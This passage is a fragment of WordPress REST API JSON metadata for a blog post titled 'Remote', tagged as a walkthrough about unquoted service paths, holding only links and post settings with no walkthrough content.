class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/07\/remote\/\">Read more<span class=\"screen-reader-text\">Remote<\/span><\/a><\/div>\n","protected":false,"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[430],"class_list":["post-1589","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-unquoted-service-path","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1589"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589\/revisions"}],"predecessor-version":[{"id":1590,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1589\/revisions\/1590"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygoru
n.com\/blog\/wp-json\/wp\/v2\/tags?post=1589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}